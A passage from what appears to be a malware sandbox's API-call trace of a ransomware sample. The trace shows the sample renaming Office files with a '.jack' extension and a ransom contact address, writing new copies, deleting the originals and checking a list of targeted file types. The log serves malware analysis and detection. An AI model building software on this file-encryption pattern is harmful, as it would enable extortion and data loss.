"c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0207.276] GetLastError () returned 0x0 [0207.276] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0xd2f, lpOverlapped=0x0) returned 1 [0207.296] WriteFile (in: hFile=0x418, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xd30, lpOverlapped=0x0) returned 1 [0207.300] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.300] WriteFile (in: hFile=0x418, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 [0207.300] SetEndOfFile (hFile=0x418) returned 1 [0207.301] CloseHandle (hObject=0x418) returned 1 [0207.302] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.302] SetEndOfFile (hFile=0x3b8) returned 1 [0207.303] CloseHandle (hObject=0x3b8) returned 1 [0207.303] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.303] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml")) returned 1 [0207.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0207.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0207.303] lstrlenW (lpString=".doc") returned 4 [0207.303] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.303] lstrlenW (lpString=".docx") returned 5 [0207.304] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0207.304] lstrlenW (lpString=".pdf") returned 4 [0207.304] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.304] lstrlenW (lpString=".xls") returned 4 [0207.304] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.304] lstrlenW (lpString=".xlsx") returned 5 [0207.304] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0207.304] lstrlenW (lpString=".ppt") returned 4 [0207.304] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0207.304] lstrlenW (lpString=".zip") returned 4 [0207.304] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.304] lstrlenW (lpString=".rar") returned 4 [0207.304] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.304] lstrlenW (lpString=".bz2") returned 4 [0207.304] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.304] lstrlenW (lpString=".7z") returned 3 [0207.304] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0207.304] lstrlenW (lpString=".dbf") returned 4 [0207.304] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0207.304] lstrlenW (lpString=".1cd") returned 4 [0207.304] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0207.304] lstrlenW (lpString=".jpg") returned 4 [0207.304] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0207.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0207.305] lstrlenW (lpString=".doc") returned 4 [0207.305] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.305] lstrlenW (lpString=".docx") returned 5 [0207.305] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0207.305] lstrlenW (lpString=".pdf") returned 4 [0207.305] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.305] lstrlenW (lpString=".xls") returned 4 [0207.305] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.305] lstrlenW (lpString=".xlsx") returned 5 [0207.305] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0207.305] lstrlenW (lpString=".ppt") returned 4 [0207.305] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0207.306] lstrlenW (lpString=".zip") returned 4 [0207.306] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.306] lstrlenW (lpString=".rar") returned 4 [0207.306] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.306] lstrlenW (lpString=".bz2") returned 4 [0207.306] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.306] lstrlenW (lpString=".7z") returned 3 [0207.306] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0207.306] lstrlenW (lpString=".dbf") returned 4 [0207.306] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0207.306] lstrlenW (lpString=".1cd") returned 4 [0207.306] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0207.306] lstrlenW (lpString=".jpg") returned 4 [0207.306] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.306] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0207.306] lstrlenW (lpString="AppXManifest.common.xml") returned 23 [0207.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0207.307] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=2173046) returned 1 [0207.307] CloseHandle (hObject=0x3b8) returned 1 [0207.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml")) returned 0x220 [0207.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.307] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 1 [0207.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0207.308] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fc64 | out: lpNewFilePointer=0x0) returned 1 [0207.308] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fc24 | out: lpNewFilePointer=0x0) returned 1 [0207.308] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b9fc30, lpOverlapped=0x0 | out: lpBuffer=0x466a058*, lpNumberOfBytesRead=0x3b9fc30*=0x40000, lpOverlapped=0x0) returned 1 [0207.526] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xb0d7c, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fc24 | out: lpNewFilePointer=0x0) returned 1 [0207.527] ReadFile (in: hFile=0x3b8, lpBuffer=0x46aa058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b9fc30, lpOverlapped=0x0 | out: lpBuffer=0x46aa058*, lpNumberOfBytesRead=0x3b9fc30*=0x40000, lpOverlapped=0x0) returned 1 [0207.697] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3b9fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0207.697] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x1d2876, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fc24 | out: lpNewFilePointer=0x0) returned 1 [0207.697] ReadFile (in: hFile=0x3b8, lpBuffer=0x46ea058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b9fc30, lpOverlapped=0x0 | out: lpBuffer=0x46ea058*, lpNumberOfBytesRead=0x3b9fc30*=0x40000, lpOverlapped=0x0) returned 1 [0208.595] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.596] WriteFile (in: hFile=0x3b8, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xc011a, lpNumberOfBytesWritten=0x3b9fca8, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fca8*=0xc011a, lpOverlapped=0x0) returned 1 [0208.881] SetEndOfFile (hFile=0x3b8) returned 1 [0209.349] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40000) returned 0x4811068 [0209.354] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fc74 | out: lpNewFilePointer=0x0) returned 1 [0209.354] WriteFile (in: hFile=0x3b8, lpBuffer=0x4811068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b9fc80, lpOverlapped=0x0 | out: lpBuffer=0x4811068*, lpNumberOfBytesWritten=0x3b9fc80*=0x40000, lpOverlapped=0x0) returned 1 [0209.364] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xb0d7c, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fc74 | out: lpNewFilePointer=0x0) returned 1 [0209.364] WriteFile (in: hFile=0x3b8, lpBuffer=0x4811068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b9fc80, lpOverlapped=0x0 | out: lpBuffer=0x4811068*, lpNumberOfBytesWritten=0x3b9fc80*=0x40000, lpOverlapped=0x0) returned 1 [0209.367] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x1d2876, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fc74 | out: lpNewFilePointer=0x0) returned 1 [0209.367] WriteFile (in: hFile=0x3b8, lpBuffer=0x4811068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b9fc80, lpOverlapped=0x0 | out: lpBuffer=0x4811068*, lpNumberOfBytesWritten=0x3b9fc80*=0x40000, lpOverlapped=0x0) returned 1 [0209.369] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4811068 | out: hHeap=0x5e0000) returned 1 [0209.369] CloseHandle (hObject=0x3b8) returned 1 [0209.946] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0209.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0209.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0209.947] lstrlenW (lpString=".doc") returned 4 [0209.947] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0209.947] lstrlenW (lpString=".docx") returned 5 [0209.947] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0209.947] lstrlenW (lpString=".pdf") returned 4 [0209.947] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0209.947] lstrlenW (lpString=".xls") returned 4 [0209.947] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0209.947] lstrlenW (lpString=".xlsx") returned 5 [0209.947] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0209.947] lstrlenW (lpString=".ppt") returned 4 [0209.947] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0209.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0209.947] lstrlenW (lpString=".zip") returned 4 [0209.947] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0209.947] lstrlenW (lpString=".rar") returned 4 [0209.947] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0209.947] lstrlenW (lpString=".bz2") returned 4 [0209.947] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0209.947] lstrlenW (lpString=".7z") returned 3 [0209.947] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0209.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0209.947] lstrlenW (lpString=".dbf") returned 4 [0209.948] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0209.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0209.948] lstrlenW (lpString=".1cd") returned 4 [0209.948] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0209.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0209.948] lstrlenW (lpString=".jpg") returned 4 [0209.948] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0209.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0209.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0209.948] lstrlenW (lpString=".doc") returned 4 [0209.948] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0209.948] lstrlenW (lpString=".docx") returned 5 [0209.948] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0209.948] lstrlenW (lpString=".pdf") returned 4 [0209.948] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0209.948] lstrlenW (lpString=".xls") returned 4 [0209.948] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0209.948] lstrlenW (lpString=".xlsx") returned 5 [0209.948] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0209.948] lstrlenW (lpString=".ppt") returned 4 [0209.948] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0209.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0209.948] lstrlenW (lpString=".zip") returned 4 [0209.948] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0209.948] lstrlenW (lpString=".rar") returned 4 [0209.948] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0209.948] lstrlenW (lpString=".bz2") returned 4 [0209.948] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0209.948] lstrlenW (lpString=".7z") returned 3 [0209.948] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0209.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0209.948] lstrlenW (lpString=".dbf") returned 4 [0209.948] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0209.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0209.948] lstrlenW (lpString=".1cd") returned 4 [0209.948] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0209.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0209.949] lstrlenW (lpString=".jpg") returned 4 [0209.949] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0209.949] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0209.949] lstrlenW (lpString="AG00158_.GIF") returned 12 [0209.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0210.264] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=5030) returned 1 [0210.264] CloseHandle (hObject=0x3f4) returned 1 [0210.264] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif")) returned 0x220 [0210.264] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0210.596] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.596] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0210.598] GetLastError () returned 0x0 [0210.598] ReadFile (in: hFile=0x424, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x13a6, lpOverlapped=0x0) returned 1 [0210.804] WriteFile (in: hFile=0x418, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13b0, lpOverlapped=0x0) returned 1 [0210.805] ReadFile (in: hFile=0x424, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0210.805] WriteFile (in: hFile=0x418, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xec, lpOverlapped=0x0) returned 1 [0210.805] SetEndOfFile (hFile=0x418) returned 1 [0210.805] CloseHandle (hObject=0x418) returned 1 [0210.811] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.811] SetEndOfFile (hFile=0x424) returned 1 [0210.812] CloseHandle (hObject=0x424) returned 1 [0210.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0210.812] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif")) returned 1 [0210.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0210.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0210.813] lstrlenW (lpString=".doc") returned 4 [0210.813] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0210.813] lstrlenW (lpString=".docx") returned 5 [0210.813] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0210.813] lstrlenW (lpString=".pdf") returned 4 [0210.813] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0210.813] lstrlenW (lpString=".xls") returned 4 [0210.813] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0210.813] lstrlenW (lpString=".xlsx") returned 5 [0210.813] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0210.813] lstrlenW (lpString=".ppt") returned 4 [0210.813] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0210.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0210.813] lstrlenW (lpString=".zip") returned 4 [0210.813] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.813] lstrlenW (lpString=".rar") returned 4 [0210.813] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.813] lstrlenW (lpString=".bz2") returned 4 [0210.813] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0210.813] lstrlenW (lpString=".7z") returned 3 [0210.813] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0210.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0210.813] lstrlenW (lpString=".dbf") returned 4 [0210.813] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0210.813] lstrlenW (lpString=".1cd") returned 4 [0210.813] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0210.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0210.814] lstrlenW (lpString=".jpg") returned 4 [0210.814] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0210.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0210.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0210.814] lstrlenW (lpString=".doc") returned 4 [0210.814] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0210.814] lstrlenW (lpString=".docx") returned 5 [0210.814] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0210.814] lstrlenW (lpString=".pdf") returned 4 [0210.814] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0210.814] lstrlenW (lpString=".xls") returned 4 [0210.814] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0210.814] lstrlenW (lpString=".xlsx") returned 5 [0210.814] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0210.814] lstrlenW (lpString=".ppt") returned 4 [0210.814] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0210.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0210.814] lstrlenW (lpString=".zip") returned 4 [0210.814] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.814] lstrlenW (lpString=".rar") returned 4 [0210.814] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.814] lstrlenW (lpString=".bz2") returned 4 [0210.814] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0210.814] lstrlenW (lpString=".7z") returned 3 [0210.814] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0210.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0210.814] lstrlenW (lpString=".dbf") returned 4 [0210.814] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0210.814] lstrlenW (lpString=".1cd") returned 4 [0210.814] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0210.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 68 [0210.814] lstrlenW (lpString=".jpg") returned 4 [0210.815] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0210.815] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0210.815] lstrlenW (lpString="AG00160_.GIF") returned 12 [0210.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0210.815] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=1146) returned 1 [0210.815] CloseHandle 